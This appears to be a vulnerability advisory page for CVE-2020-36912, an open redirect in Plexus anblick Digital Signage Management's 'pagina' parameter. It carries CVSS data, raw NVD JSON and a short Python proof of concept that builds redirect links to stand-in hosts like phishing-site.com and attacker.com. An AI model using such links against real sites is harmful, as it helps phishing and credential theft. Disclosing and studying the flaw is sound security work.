Security Vulnerability Report
CVE-2020-36912 CVSS 9.8 CRITICAL

Published: 2026-01-06 16:15:47
Last Modified: 2026-04-15 00:35:42

Description

Plexus anblick Digital Signage Management 3.1.13 contains an open redirect vulnerability in the 'PantallaLogin' script that allows attackers to manipulate the 'pagina' GET parameter. Attackers can craft malicious links that redirect users to arbitrary websites by exploiting improper input validation in the parameter.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Plexus anblick Digital Signage Management 3.1.13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2020-36912 Open Redirect PoC
# Target: Plexus anblick Digital Signage Management 3.1.13
# Vulnerability: Open redirect via 'pagina' GET parameter in PantallaLogin

import urllib.parse


def generate_malicious_url(target_url, redirect_target):
    """
    Generate malicious URL for open redirect exploitation

    Args:
        target_url: Base URL of vulnerable application
        redirect_target: Malicious site to redirect victims to

    Returns:
        Malicious URL string
    """
    # Encode the redirect target to bypass basic filters
    encoded_target = urllib.parse.quote(redirect_target, safe='')

    # Construct the exploit URL with the vulnerable 'pagina' parameter
    malicious_url = f"{target_url}/PantallaLogin?pagina={encoded_target}"

    return malicious_url


# Example usage
exploit_url = generate_malicious_url(
    target_url="https://vulnerable-server.com",
    redirect_target="https://phishing-site.com"
)

print(f"Malicious URL: {exploit_url}")
print(f"When victim visits this URL and logs in, they will be redirected to phishing-site.com")

# Alternative direct PoC (unencoded)
# https://vulnerable-server.com/PantallaLogin?pagina=https://attacker.com

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2020-36912", "sourceIdentifier": "[email protected]", "published": "2026-01-06T16:15:47.027", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Plexus anblick Digital Signage Management 3.1.13 contains an open redirect vulnerability in the 'PantallaLogin' script that allows attackers to manipulate the 'pagina' GET parameter. Attackers can craft malicious links that redirect users to arbitrary websites by exploiting improper input validation in the parameter."}, {"lang": "es", "value": "Plexus anblick Digital Signage Management 3.1.13 contiene una vulnerabilidad de redirección abierta en el script 'PantallaLogin' que permite a los atacantes manipular el parámetro GET 'pagina'. Los atacantes pueden crear enlaces maliciosos que redirigen a los usuarios a sitios web arbitrarios aprovechando una validación de entrada incorrecta en el parámetro."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", 
"modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-601"}]}], "references": [{"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/185521", "source": "[email protected]"}, {"url": "https://packetstormsecurity.com/files/158473", "source": "[email protected]"}, {"url": "https://www.plexus.es/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/plexus-anblick-digital-signage-management-open-redirect-via-pagina-parameter", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5573.php", "source": "[email protected]"}]}}